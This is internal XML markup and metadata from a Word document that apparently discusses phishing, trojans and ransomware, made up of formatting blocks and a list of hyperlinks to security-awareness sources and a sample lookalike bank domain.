        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="269164069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="279072607">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="463544858">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="574097512">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="622269705">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="647593708">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="671302635">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="697395028">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="843278126">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="959722190">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1093161727">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123232743">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1160774422">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1321737574">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1469934201">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1627202766">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645161975">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1738354981">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1840806122">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960719555">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2018923120">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2026439583">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20748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yourbankk.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-sca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auri870/ransomware" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kaspersky.com/resource-center/threats/trojans" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/Ransomware" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cc.gatech.edu/~bader/COURSES/GATECH/CS4210-Spring-2011/Reversing-CREU.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://github.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/spyware/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perception-point.com/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/security/email-security/what-is-phishing.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@yourbank.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3341</TotalTime>
  <Pages>28</Pages>
  <Words>8400</Words>
  <Characters>47884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Sivaselvam</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rahul Sivaselvam</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-29T11:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-01T21:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>